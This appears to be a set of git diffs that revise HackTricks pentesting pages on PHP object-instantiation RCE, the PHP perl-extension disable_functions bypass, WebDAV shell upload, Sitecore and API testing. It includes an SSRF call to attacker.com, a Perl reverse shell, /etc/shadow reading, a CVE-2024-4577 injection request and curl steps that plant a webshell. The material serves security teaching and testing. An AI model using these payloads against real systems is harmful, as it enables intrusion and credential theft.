+The official `method-override` middleware checks only original `POST` requests by default (`options.methods: ['POST']`), so prioritize `POST` requests with header, body, and query-string override values.<sup>[[6]](#references)</sup>
  
 ## References
 
 - [1] [Express behind proxies - Express.js](https://expressjs.com/en/guide/behind-proxies.html)
 - [2] [Server-side prototype pollution: Black-box detection without the DoS - PortSwigger Research](https://portswigger.net/research/server-side-prototype-pollution)
+- [3] [DigitalInterruption/cookie-monster](https://github.com/DigitalInterruption/cookie-monster)
+- [4] [Express.js - cookie-parser middleware](https://expressjs.com/en/resources/middleware/cookie-parser.html)
+- [5] [Express.js - express-session middleware](https://expressjs.com/en/resources/middleware/session.html)
+- [6] [Express.js - method-override middleware](https://expressjs.com/en/resources/middleware/method-override.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md
@@ -6,7 +6,7 @@ This is basically a summary of [https://swarm.ptsecurity.com/exploiting-arbitrar
 
 ## Introduction
 
-The creation of new arbitrary objects, such as `new $_GET["a"]($_GET["a"])`, can lead to Remote Code Execution (RCE), as detailed in a [**writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/). This document highlights various strategies for achieving RCE.<sup>[[1]](#references)</sup>
+The creation of new arbitrary objects, such as `new $_GET["a"]($_GET["b"])`, can lead to Remote Code Execution (RCE), as detailed in a [**writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/). This document highlights various strategies for achieving RCE.<sup>[[1]](#references)</sup>
 
 ## RCE via Custom Classes or Autoloading
 
@@ -33,9 +33,9 @@ $b = $_GET['b'];
 new $a($b);
 ```
 
-In this instance, setting `$a` to `App` or `App2` and `$b` to a system command (e.g., `uname -a`) results in the execution of that command.<sup>[[1]](#references)</sup>
+In this instance, setting `$a` to `App` and `$b` to a system command (for example, `uname -a`) executes that command. `App2` demonstrates PHP's legacy same-name constructor: it is deprecated in PHP 7 and is not treated as a constructor in PHP 8, so that branch is version-specific.<sup>[[1]](#references)[[7]](#references)</sup>
 
-**Autoloading functions** can be exploited if no such classes are directly accessible. These functions automatically load classes from files when needed and are defined using `spl_autoload_register` or `__autoload`:<sup>[[1]](#references)</sup>
+**Autoloading functions** can be exploited if no such classes are directly accessible. These functions automatically load classes from files when needed and can be defined with `spl_autoload_register`; the example also retains legacy `__autoload`, which was deprecated in PHP 7.2 and removed in PHP 8.0.<sup>[[1]](#references)[[8]](#references)[[9]](#references)</sup>
 
 ```php
 spl_autoload_register(function ($class_name) {
@@ -61,13 +61,13 @@ Constructors of interest can be identified through the reflection API, as shown 
 
 ### **SSRF + Phar Deserialization**
 
-The `SplFileObject` class enables SSRF through its constructor, allowing connections to any URL:<sup>[[1]](#references)</sup>
+The `SplFileObject` constructor can provide an SSRF primitive when the requested stream wrapper is enabled; HTTP/FTP URL wrappers also depend on `allow_url_fopen`.<sup>[[1]](#references)</sup>
 
 ```php
 new SplFileObject('http://attacker.com/');
 ```
 
-SSRF can lead to deserialization attacks in versions of PHP before 8.0 using the Phar protocol.<sup>[[1]](#references)</sup>
+Before PHP 8.0, filesystem operations on a `phar://` URL could automatically deserialize Phar metadata and turn SSRF/file-operation primitives into object injection. PHP 8.0 stopped automatic metadata unserialization, so later versions require an explicit `Phar::getMetadata()` path or another gadget.<sup>[[1]](#references)[[9]](#references)</sup>
 
 ### **Exploiting PDOs**
 
@@ -187,5 +187,8 @@ Notes:<sup>[[2]](#references)</sup>
 - [4] [Craft CMS and CVE-2025-32432](https://craftcms.com/knowledge-base/craft-cms-cve-2025-32432)
 - [5] [Yii 2.0.52 security advisory](https://www.yiiframework.com/news/709/please-upgrade-to-yii-2-0-52)
 - [6] [Yii `yii\rbac\PhpManager` API docs](https://www.yiiframework.com/doc/api/2.0/yii-rbac-phpmanager)
+- [7] [PHP manual - Constructors and Destructors](https://www.php.net/manual/en/language.oop5.decon.php)
+- [8] [PHP manual - Autoloading Classes](https://www.php.net/manual/en/language.oop5.autoload.php)
+- [9] [PHP 8 migration guide - Backward incompatible changes](https://www.php.net/manual/en/migration80.incompatible.php)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md
@@ -4,46 +4,45 @@
 
 ## Background
 
-The issue tracked as **CVE-2007-4596** comes from the legacy `perl` PHP extension, which embeds a full Perl interpreter without honoring PHP's `safe_mode`, `disable_functions`, or `open_basedir` controls. Any PHP worker that loads `extension=perl.so` gains unrestricted Perl `eval`, so command execution remains trivial even when all classic PHP process-spawning primitives are blocked. Although `safe_mode` disappeared in PHP 5.4, many outdated shared-hosting stacks and vulnerable labs still ship it, so this bypass is still valuable when you land on legacy control panels.<sup>[[1]](#references)</sup>
+The issue tracked as **CVE-2007-4596** comes from the legacy `perl` PHP extension, which embeds a Perl interpreter without enforcing PHP's `safe_mode` restrictions. Perl evaluation also operates outside controls such as PHP's `disable_functions` and `open_basedir`, so a loaded extension can expose command and filesystem primitives that PHP attempted to restrict. `safe_mode` disappeared in PHP 5.4; this technique is relevant primarily to old shared-hosting installations and deliberately vulnerable labs.<sup>[[1]](#references)[[2]](#references)</sup>
 
-## Compatibility & Packaging Status (2025)
+## Compatibility and Packaging Status
 
-- The last PECL release (`perl-1.0.1`, 2013) targets PHP ≥5.0; PHP 8+ generally fails because the Zend APIs changed.<sup>[[2]](#references)</sup>
-- PECL is being superseded by PIE, but older stacks still ship PECL/pear.<sup>[[4]](#references)</sup> Use the flow below on PHP 5/7 targets; on newer PHP expect to downgrade or switch to another injection path (e.g., userland FFI).
+- The last PECL release (`perl-1.0.1`, 2013) declares PHP 5.0 or newer, but the package is unmaintained and its source targets the PHP 5-era Zend API. PHP 7/8 generally require an unofficial port and an exact ABI build; the version string alone does not establish compatibility.<sup>[[2]](#references)</sup>
+- PECL is being superseded by PIE, but legacy stacks still ship PECL/PEAR.<sup>[[4]](#references)</sup> Treat the flow below as a PHP 5 lab recipe unless a target already contains a compatible extension.
 
 ## Building a Testable Environment in 2025
 
 - Fetch `perl-1.0.1` from PECL, compile it for the PHP branch you plan to attack, and load it globally (`php.ini`) or via `dl()` (if permitted).
-- Quick Debian-based lab recipe:
+- Legacy Debian-based lab recipe (requires an archive or third-party repository that still provides PHP 5.6 packages):
   ```bash
   sudo apt install php5.6 php5.6-dev php-pear build-essential
   sudo pecl install perl-1.0.1
   echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
   sudo phpenmod perl && sudo systemctl restart apache2
   ```
-- During exploitation confirm availability with `var_dump(extension_loaded('perl'));` or `print_r(get_loaded_extensions());`. If absent, search for `perl.so` or abuse writable `php.ini`/`.user.ini` entries to force-load it.
-- Because the interpreter lives inside the PHP worker, no external binaries are needed—network egress filters or `proc_open` blacklists do not matter.
+- During an authorized test, confirm availability with `var_dump(extension_loaded('perl'));` or `print_r(get_loaded_extensions());`. If absent, search for a correctly built `perl.so` and writable **system-level** PHP configuration. The `extension` directive is `php.ini`-only and cannot be set in `.user.ini`.<sup>[[8]](#references)</sup>
+- Because the interpreter lives inside the PHP worker, Perl code does not need `/usr/bin/perl` or PHP process-launching functions. Operating-system permissions, mandatory access controls, and network-egress filtering still apply.
 
-### On-host build chain when phpize is reachable
+### On-host build chain with shell and compiler access
 
-If `phpize` and build-essential are present on the compromised host, you can compile and drop `perl.so` without shelling out to the OS:
+If `phpize`, a compiler toolchain, Perl development headers, and shell execution are available, you can build a matching `perl.so` on the host:
 
 ```bash
 # grab the tarball from PECL
 wget https://pecl.php.net/get/perl-1.0.1.tgz
 tar xvf perl-1.0.1.tgz && cd perl-1.0.1
 phpize
-./configure --with-perl=/usr/bin/perl --with-php-config=$(php -r 'echo PHP_BINARY;')-config
+./configure --with-perl=/usr/bin/perl --with-php-config="$(command -v php-config)"
 make -j$(nproc)
 cp modules/perl.so /tmp/perl.so
-# then load with a .user.ini in the webroot if main php.ini is read-only
-echo "extension=/tmp/perl.so" > /var/www/html/.user.ini
+# loading requires a writable php.ini/scanned system INI or control of CGI arguments/service config
 ```
-If `open_basedir` is enforced, ensure the dropped `.user.ini` and `.so` live in an allowed path; the `extension=` directive is still honored inside the basedir. The compilation flow mirrors the PHP manual for building PECL extensions.<sup>[[3]](#references)</sup>
+The module must match PHP's API, architecture, thread-safety mode, and linked Perl ABI. `open_basedir` is not a substitute for controlling extension loading, but an attacker still needs a configuration or process-start primitive that accepts `extension=`. The compilation flow mirrors the PHP manual for building PECL extensions.<sup>[[3]](#references)[[8]](#references)</sup>
 
 ## Original PoC (NetJackal)
 
-From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/), still handy to confirm the extension responds to `eval`:<sup>[[7]](#references)</sup>
+The original NetJackal PoC remains useful for confirming that the legacy extension responds to `eval`:<sup>[[1]](#references)[[7]](#references)</sup>
 
 ```php
 <?php
@@ -61,9 +60,9 @@ echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25>
 
 ## Modern Payload Enhancements
 
-### 1. Full TTY over TCP
+### 1. Reverse shell over TCP
 
-The embedded interpreter can load `IO::Socket` even if `/usr/bin/perl` is blocked:
+The embedded interpreter can load `IO::Socket` even if `/usr/bin/perl` is blocked. This provides a basic interactive shell over pipes, not a fully allocated terminal/PTY:<sup>[[2]](#references)</sup>
 
 ```php
 $perl = new perl();
@@ -89,9 +88,9 @@ $perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');
 
 Pipe the output through `IO::Socket::INET` or `Net::HTTP` to exfiltrate data without touching PHP-managed descriptors.
 
-### 3. Inline Compilation for Privilege Escalation
+### 3. Inline native helper compilation
 
-If `Inline::C` exists system-wide, compile helpers inside the request without relying on PHP’s `ffi` or `pcntl`:
+If `Inline::C`, a compiler, writable build directories, and headers exist, Perl can compile native helpers without PHP's `ffi` or `pcntl`. This does **not** inherently escalate privileges: `setuid(0)` succeeds only if the worker already has that privilege or a separate local privilege-escalation condition exists.
 
 ```php
 $perl = new perl();
@@ -107,7 +106,7 @@ PL
 
 ### 4. Living-off-the-Land Enumeration
 
-Treat Perl as a LOLBAS toolkit—e.g., dump MySQL DSNs even if `mysqli` is missing:
+Treat embedded Perl as a living-off-the-land interpreter. For example, DBI can enumerate data sources exposed by an installed MySQL driver even if PHP's `mysqli` extension is missing:
 
 ```php
 $perl = new perl();
@@ -116,13 +115,13 @@ $perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);
 
 ## 2024+ Abuse: Loading `perl.so` via PHP-CGI Argument Injection (CVE-2024-4577)
 
-On Windows installs that still expose **PHP-CGI**, the 2024 argument-injection regression (CVE-2024-4577) lets you pass arbitrary `-d` options to the interpreter. That means you can load the Perl extension even when `dl()` is disabled and `php.ini` is read-only:<sup>[[5]](#references)</sup>
+On vulnerable Windows installations that expose **PHP-CGI**, CVE-2024-4577 can convert a soft hyphen to a command-line hyphen under affected Windows best-fit locales, allowing injected `-d` options. If—and only if—the attacker already has an ABI-, architecture-, and thread-safety-compatible Windows Perl extension DLL, this can load it even when `dl()` is disabled and `php.ini` is read-only.<sup>[[5]](#references)</sup>
 
-* Build or upload a compatible `perl.dll`/`perl.so` to a web-writable path (e.g., `C:\xampp\htdocs\temp\perl.dll`).
+* Build or upload a compatible Windows extension DLL (for example, `C:\xampp\htdocs\temp\php_perl.dll`). PECL does not provide a current drop-in DLL, making this prerequisite uncommon.
 * Send a single HTTP request that injects `-d extension=C:\\xampp\\htdocs\\temp\\perl.dll` and, in the same request body, a Perl-backed payload:
 
 ```http
-POST /?%ADd+extension=C:\\xampp\\htdocs\\temp\\perl.dll+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
+POST /?%ADd+extension=C:\\xampp\\htdocs\\temp\\php_perl.dll+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
 Host: victim
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 120
@@ -130,16 +129,18 @@ Content-Length: 120
 <?php $p=new perl(); $p->eval("system('whoami && hostname')"); ?>
 ```
 
-Because the PHP worker now embeds Perl before reading the body, all classic `disable_functions`/`open_basedir` controls are bypassed. This works on vulnerable Windows/CGI stacks until patched (PHP 8.1.29/8.2.20/8.3.8 and later close the regression).<sup>[[6]](#references)</sup> If `open_basedir` blocks the DLL path, drop the file inside the allowed base dir first or leverage an existing world-readable DLL path shipped by XAMPP.
+If the DLL loads, the PHP worker embeds Perl before evaluating the request body, exposing the same out-of-policy Perl primitives. The initial fix shipped in PHP 8.1.29/8.2.20/8.3.8, and a later bypass was addressed as CVE-2024-8926 in PHP 8.1.30/8.2.24/8.3.12; defenders should run a currently supported, fully updated PHP release rather than stopping at the first fixed version.<sup>[[6]](#references)[[9]](#references)</sup>
 
 ## References
 
-- [1] [CVE-2007-4596 summary and timeline](https://www.cvedetails.com/cve/CVE-2007-4596/)
+- [1] [NVD - CVE-2007-4596](https://nvd.nist.gov/vuln/detail/CVE-2007-4596)
 - [2] [PECL perl extension package information](https://pecl.php.net/package/perl)
 - [3] [PHP Manual: building PECL extensions with phpize](https://www.php.net/manual/en/install.pecl.phpize.php)
 - [4] [PECL homepage announcing PIE replacement](https://pecl.php.net/)
 - [5] [CVE-2024-4577 PHP-CGI argument injection PoC](https://github.com/AlperenY-cs/CVE-2024-4577)
 - [6] [Plesk advisory summarizing CVE-2024-4577 impact and patched versions](https://support.plesk.com/hc/en-us/articles/24020385443351-Security-Alert-CVE-2024-4577-PHP-CGI-Argument-Injection-Vulnerability)
-- [7] [PHP disable_functions bypass techniques collection - SafeBuff blog](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
+- [7] [Exploit-DB 4314 - PHP Perl Extension Safe Mode Bypass](https://www.exploit-db.com/exploits/4314)
+- [8] [PHP manual - core INI directives and `extension` changeability](https://www.php.net/manual/en/ini.core.php)
+- [9] [PHP 8 ChangeLog - CVE-2024-4577 and CVE-2024-8926 fixes](https://www.php.net/ChangeLog-8.php)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/put-method-webdav.md
+++ b/src/network-services-pentesting/pentesting-web/put-method-webdav.md
@@ -1,10 +1,10 @@
-# WebDav
+# WebDAV
 
 {{#include ../../banners/hacktricks-training.md}}
 
-When dealing with a **HTTP Server with WebDav** enabled, it's possible to **manipulate files** if you have the right **credentials**, usually verified through **HTTP Basic Authentication**. Gaining control over such a server often involves the **upload and execution of a webshell**.<sup>[[1]](#references)</sup>
+When an **HTTP server with WebDAV** exposes write-capable collections, an authorized principal may create, copy, move, or delete resources according to the server's access controls. Authentication may use Basic, Digest, NTLM/Kerberos, client certificates, or an application-specific mechanism; Basic is common in labs but is not required by WebDAV. If a writable collection is also mapped to a server-side script engine, an uploaded file may become code execution.<sup>[[1]](#references)[[5]](#references)</sup>
 
-Access to the WebDav server typically requires **valid credentials**, with [**WebDav bruteforce**](../../generic-hacking/brute-force.md#http-basic-auth) being a common method to acquire them.
+Access normally requires **valid credentials**. During an authorized assessment, test the applicable authentication scheme and lockout policy; the [HTTP Basic authentication testing notes](../../generic-hacking/brute-force.md#http-basic-auth) apply only when Basic is actually offered.
 
 To overcome restrictions on file uploads, especially those preventing the execution of server-side scripts, you might:
 
@@ -14,10 +14,10 @@ To overcome restrictions on file uploads, especially those preventing the execut
 
 ## DavTest
 
-**Davtest** try to **upload several files with different extensions** and **check** if the extension is **executed**:
+**DAVTest** attempts to upload files with several extensions and checks whether the resulting resources are accessible or executed:
 
 ```bash
-davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
+davtest [-auth user:password] -move -sendbd auto -url http://<IP> # Upload .txt files and try to move them to other extensions
 davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension
 ```
 
@@ -25,11 +25,11 @@ Output sample:
 
 ![WebDav - DavTest: davtest (-auth user:password) -sendbd auto -url http:// Try to upload every extension](<../../images/image (851).png>)
 
-This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web.
+A successful access test for **`.txt`** or **`.html`** does not mean the server executes those extensions; it only proves that the files are retrievable.
 
 ## Cadaver
 
-You can use this tool to **connect to the WebDav** server and perform actions (like **upload**, **move** or **delete**) **manually**.
+Cadaver is an interactive WebDAV client for manually uploading, moving, copying, and deleting resources.
 
 ```
 cadaver <IP>
@@ -38,26 +38,26 @@ cadaver <IP>
 ## PUT request
 
 ```
-curl -T 'shell.txt' 'http://$ip'
+curl -T 'shell.txt' "http://$ip/"
 ```
 
 ## MOVE request
 
 ```bash
-curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
+curl -X MOVE --header "Destination: http://$ip/shell.php" "http://$ip/shell.txt"
 ```
 
 ## IIS5/6 WebDav Vulnerability
 
-This vulnerability is very interesting. The **WebDav** does **not allow** to **upload** or **rename** files with the extension **.asp**. But you can **bypass** this **adding** at the end of the name **";.txt"** and the file will be **executed** as if it were a .asp file (you could also **use ".html" instead of ".txt"** but **DON'T forget the ";"**).
+Historical IIS 5/6 deployments could combine WebDAV extension filtering with wildcard ASP mappings in a way that rejected a direct `.asp` upload but treated a name such as `.asp;.txt` as executable ASP. This depends on obsolete IIS/script-map configuration and should not be expected on current IIS.<sup>[[5]](#references)</sup>
 
-Then you can **upload** your shell as a ".**txt" file** and **copy/move it to a ".asp;.txt"** file. An accessing that file through the web server, it will be **executed** (cadaver will said that the move action didn't work, but it did).
+In a vulnerable lab, upload the payload as `.txt`, then copy or move it to an `.asp;.txt` name and request that resource. Some clients may report the MOVE as failed even though the destination was created, so verify with `PROPFIND` or a subsequent GET rather than trusting one status display.
 
 ![MOVE request - IIS5/6 WebDav Vulnerability: Then you can upload your shell as a ". txt" file and copy/move it to a ".asp;.txt" file. An accessing that file through the web server, it...](<../../images/image (1092).png>)
 
 ## Post credentials
 
-If the Webdav was using an Apache server you should look at configured sites in Apache. Commonly:\
+After obtaining authorized host access to an Apache WebDAV server, inspect its enabled virtual-host configuration. A common path is:\
 _**/etc/apache2/sites-enabled/000-default**_
 
 Inside it you could find something like:
@@ -73,15 +73,15 @@ ServerAdmin webmaster@localhost
                 Require valid-user
 ```
 
-As you can see there is the files with the valid **credentials** for the **webdav** server:
+The `AuthUserFile` directive identifies the password file used for this directory:
 
 ```
 /etc/apache2/users.password
 ```
 
-Inside this type of files you will find the **username** and a **hash** of the password. These are the credentials the webdav server is using to authenticate users.
+Such files contain usernames and password verifiers, not plaintext passwords. Preserve permissions and crack or modify them only within the engagement scope.
 
-You can try to **crack** them, or to **add more** if for some reason you wan to **access** the **webdav** server:
+With authorization, you can audit a verifier or add/update an account:
 
 ```bash
 htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password
@@ -101,7 +101,7 @@ WebDAV is also useful on the **client side**: Windows can treat a remote WebDAV 
 
 An Internet Shortcut can launch a **local signed binary** while forcing its **current working directory** to an attacker-controlled WebDAV share. If that parent process later starts a child **by bare filename** (for example `route.exe` instead of `C:\Windows\System32\route.exe`), Windows may resolve and execute the remote file from WebDAV first.
 
-This was highlighted by **CVE-2025-33053**, but the dangerous primitive is more general: **any binary that resolves children or dependencies from an attacker-controlled working directory** can become a WebDAV execution gadget.<sup>[[3]](#references)[[4]](#references)</sup>
+This was highlighted by **CVE-2025-33053**. Patched Windows releases address the documented chain, but the general audit lesson remains: a binary that resolves children or dependencies from an attacker-controlled working directory can become a remote search-path execution gadget.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ```ini
 [InternetShortcut]
@@ -152,5 +152,6 @@ Similar delivery can use **`.library-ms`** files that point to external UNC/WebD
 - [2] [Rapid7 - Inside an Exposed Malware Delivery Lab: OPSEC Failures Behind a WebDAV Phishing Operation](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)
 - [3] [NVD - CVE-2025-33053](https://nvd.nist.gov/vuln/detail/CVE-2025-33053)
 - [4] [Stealth Falcon's Exploit of Microsoft Zero Day Vulnerability - Check Point Research](https://research.checkpoint.com/2025/stealth-falcon-zero-day/)
+- [5] [RFC 4918 - HTTP Extensions for Web Distributed Authoring and Versioning (WebDAV)](https://www.rfc-editor.org/rfc/rfc4918)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/sitecore/README.md
+++ b/src/network-services-pentesting/pentesting-web/sitecore/README.md
@@ -2,10 +2,10 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-This page summarises a practical attack chain against Sitecore XP 10.4.1 that pivots from a pre‑auth XAML handler to HTML cache poisoning and, via an authenticated UI flow, to RCE through BinaryFormatter deserialization. The techniques generalise to similar Sitecore versions/components and provide concrete primitives to test, detect, and harden.<sup>[[1]](#references)</sup>
+This page summarizes a practical attack chain tested against Sitecore XP 10.4.1. It pivots from a pre-auth XAML handler to HTML cache poisoning and, through an authenticated UI flow, to RCE through `BinaryFormatter` deserialization.<sup>[[1]](#references)</sup> Use Sitecore's advisories to determine exposure for a specific product and release; exact handlers, control IDs, permissions, and cache keys can differ between deployments.
 
-- Affected product tested: Sitecore XP 10.4.1 rev. 011628
-- Fixed in: KB1003667, KB1003734 (June/July 2025)<sup>[[2]](#references)[[3]](#references)</sup>
+- Research target: Sitecore XP 10.4.1 rev. 011628
+- Vendor fixes: KB1003667 and KB1003734 (June/July 2025). The related CVE records cover different product/version ranges, so assess CVE-2025-53691, CVE-2025-53693, and CVE-2025-53694 separately.<sup>[[2]](#references)[[3]](#references)[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
 See also:
 
@@ -19,7 +19,7 @@ See also:
 
 ## Pre‑auth primitive: XAML Ajax reflection → HtmlCache write
 
-Entrypoint is the pre‑auth XAML handler registered in web.config:<sup>[[1]](#references)</sup>
+The entry point is the pre-auth XAML handler registered in `web.config`:<sup>[[1]](#references)</sup>
 
 ```xml
 <add verb="*" path="sitecore_xaml.ashx" type="Sitecore.Web.UI.XamlSharp.Xaml.XamlPageHandlerFactory, Sitecore.Kernel" name="Sitecore.XamlPageRequestHandler" />
@@ -208,7 +208,7 @@ Gadget generation: use ysoserial.net / YSoNet with BinaryFormatter to produce a 
 
 ## Hardening
 
-- Apply Sitecore patches KB1003667 and KB1003734; gate/disable pre‑auth XAML handlers or add strict validation; monitor and rate‑limit `/-/xaml/`.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
+- Apply the Sitecore fixes that match the deployed product and version. Where compatibility permits, gate or disable unnecessary pre-auth XAML handlers, validate dispatched methods and parameters strictly, and monitor `/-/xaml/` requests.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 - Remove/replace BinaryFormatter; restrict access to convertToRuntimeHtml or enforce strong server‑side validation of HTML editing flows.
 - Lock down `/sitecore/api/ssc` to loopback or authenticated roles; avoid impersonation patterns that leak `TotalCount`‑based side channels.
 - Enforce MFA/least privilege for Content Editor users; review CSP to reduce JS steering impact from cache poisoning.
@@ -218,5 +218,8 @@ Gadget generation: use ysoserial.net / YSoNet with BinaryFormatter to produce a 
 - [1] [watchTowr Labs – Cache Me If You Can: Sitecore Experience Platform Cache Poisoning to RCE](https://labs.watchtowr.com/cache-me-if-you-can-sitecore-experience-platform-cache-poisoning-to-rce/)
 - [2] [Sitecore KB1003667 – Security patch](https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667)
 - [3] [Sitecore KB1003734 – Security patch](https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003734)
+- [4] [NVD - CVE-2025-53691](https://nvd.nist.gov/vuln/detail/CVE-2025-53691)
+- [5] [NVD - CVE-2025-53693](https://nvd.nist.gov/vuln/detail/CVE-2025-53693)
+- [6] [NVD - CVE-2025-53694](https://nvd.nist.gov/vuln/detail/CVE-2025-53694)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/sitecore/README.md
+++ b/src/network-services-pentesting/pentesting-web/sitecore/README.md
@@ -2,7 +2,7 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-This page summarizes a practical attack chain tested against Sitecore XP 10.4.1. It pivots from a pre-auth XAML handler to HTML cache poisoning and, through an authenticated UI flow, to RCE through `BinaryFormatter` deserialization.<sup>[[1]](#references)</sup> Use Sitecore's advisories to determine exposure for a specific product and release; exact handlers, control IDs, permissions, and cache keys can differ between deployments.
+This page summarizes a practical attack chain tested against Sitecore XP 10.4.1. It pivots from a pre-auth XAML handler to HTML cache poisoning and, through an authenticated UI flow, to RCE through `BinaryFormatter` deserialization.<sup>[[1]](#references)</sup> The underlying primitives can guide testing of similar Sitecore components, but use Sitecore's advisories to determine exposure for a specific product and release; exact handlers, control IDs, permissions, and cache keys can differ between deployments.
 
 - Research target: Sitecore XP 10.4.1 rev. 011628
 - Vendor fixes: KB1003667 and KB1003734 (June/July 2025). The related CVE records cover different product/version ranges, so assess CVE-2025-53691, CVE-2025-53693, and CVE-2025-53694 separately.<sup>[[2]](#references)[[3]](#references)[[4]](#references)[[5]](#references)[[6]](#references)</sup>
@@ -208,7 +208,7 @@ Gadget generation: use ysoserial.net / YSoNet with BinaryFormatter to produce a 
 
 ## Hardening
 
-- Apply the Sitecore fixes that match the deployed product and version. Where compatibility permits, gate or disable unnecessary pre-auth XAML handlers, validate dispatched methods and parameters strictly, and monitor `/-/xaml/` requests.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
+- Apply the Sitecore fixes that match the deployed product and version. Where compatibility permits, gate or disable unnecessary pre-auth XAML handlers, validate dispatched methods and parameters strictly, and monitor and rate-limit `/-/xaml/` requests without disrupting legitimate editing workflows.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 - Remove/replace BinaryFormatter; restrict access to convertToRuntimeHtml or enforce strong server‑side validation of HTML editing flows.
 - Lock down `/sitecore/api/ssc` to loopback or authenticated roles; avoid impersonation patterns that leak `TotalCount`‑based side channels.
 - Enforce MFA/least privilege for Content Editor users; review CSP to reduce JS steering impact from cache poisoning.

--- a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
+++ b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
@@ -15,6 +15,7 @@ Pentesting APIs involves a structured approach to uncovering vulnerabilities. Th
 ### **Practice Labs**
 
 - [**VAmPI**](https://github.com/erev0s/VAmPI): A deliberately vulnerable API for hands-on practice, covering the OWASP top 10 API vulnerabilities.
+- [**DNE Online Calculator**](http://www.dneonline.com/calculator.asmx): A public SOAP calculator whose `?WSDL` document is useful for practicing WSDL import and baseline request generation. It is a third-party demonstration service, not an intentionally vulnerable target, so keep testing to its documented operations.<sup>[[13]](#references)</sup>
 
 ### **Effective Tricks for API Pentesting**
 
@@ -157,5 +158,6 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
 - [10] [BLST Security - Cherrybomb](https://github.com/blst-security/cherrybomb)
 - [11] [Swagger UI](https://swagger.io/tools/swagger-ui/)
 - [12] [Postman Docs – Integrate Postman with OpenAPI](https://learning.postman.com/docs/integrations/available-integrations/working-with-openAPI/)
+- [13] [DNE Online - Calculator SOAP service](http://www.dneonline.com/calculator.asmx)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
+++ b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md
@@ -8,8 +8,8 @@ Pentesting APIs involves a structured approach to uncovering vulnerabilities. Th
 
 ### **Understanding API Types**
 
-- **SOAP/XML Web Services**: Utilize the WSDL format for documentation, typically found at `?wsdl` paths. Tools like **SOAPUI** and **WSDLer** (Burp Suite Extension) are instrumental for parsing and generating requests. Example documentation is accessible at [DNE Online](http://www.dneonline.com/calculator.asmx).
-- **REST APIs (JSON)**: Documentation often comes in WADL files, yet tools like [Swagger UI](https://swagger.io/tools/swagger-ui/) provide a more user-friendly interface for interaction. **Postman** is a valuable tool for creating and managing example requests.
+- **SOAP/XML Web Services**: WSDL describes services, operations, bindings, and endpoints and is often exposed through a `?wsdl` URL. Tools such as **SoapUI** and Burp's **Wsdler** extension can parse it and generate baseline requests.
+- **REST-style HTTP APIs**: JSON is common but not required. Look for an **OpenAPI** document (`openapi.json`, `swagger.json`, `/api-docs`) and render it with Swagger UI or import it into an HTTP client. WADL exists but is far less common in current deployments.<sup>[[6]](#references)[[11]](#references)</sup>
 - **GraphQL**: A query language for APIs offering a complete and understandable description of the data in your API.
 
 ### **Practice Labs**
@@ -20,7 +20,7 @@ Pentesting APIs involves a structured approach to uncovering vulnerabilities. Th
 
 - **SOAP/XML Vulnerabilities**: Explore XXE vulnerabilities, although DTD declarations are often restricted. CDATA tags may allow payload insertion if the XML remains valid.
 - **Privilege Escalation**: Test endpoints with varying privilege levels to identify unauthorized access possibilities.
-- **CORS Misconfigurations**: Investigate CORS settings for potential exploitability through CSRF attacks from authenticated sessions.
+- **CORS Misconfigurations**: Check whether untrusted origins can make credentialed requests **and read the response**. CORS and CSRF are related browser trust boundaries but are not interchangeable: CSRF can trigger a state change without response access, while exploitable CORS can expose response data to attacker-controlled JavaScript.<sup>[[7]](#references)</sup>
 - **Endpoint Discovery**: Leverage API patterns to discover hidden endpoints. Tools like fuzzers can automate this process.
